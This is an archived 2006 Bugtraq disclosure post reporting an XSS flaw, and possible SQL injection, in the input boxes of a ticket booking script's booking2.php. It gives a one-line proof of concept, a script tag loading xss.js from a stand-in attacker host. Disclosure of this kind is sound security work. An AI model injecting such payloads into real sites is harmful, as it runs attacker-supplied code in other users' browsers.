lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060609050404.1820.qmail@securityfocus.com> Date: 9 Jun 2006 05:04:04 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: mole.com.ua Ticket Booking Script - XSS Ticket Booking Script Homepage: http://www.mole.com.ua Effected files: input boxes on booking2.php XSS Vulnerabilities: The input boxes on booking2.php do not sanatize userinput before geenrating it and then submitting it to a MySQL db. This can causes XSS examples as well as possible SQL injections. For PoC just put <SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT> in any of the input boxes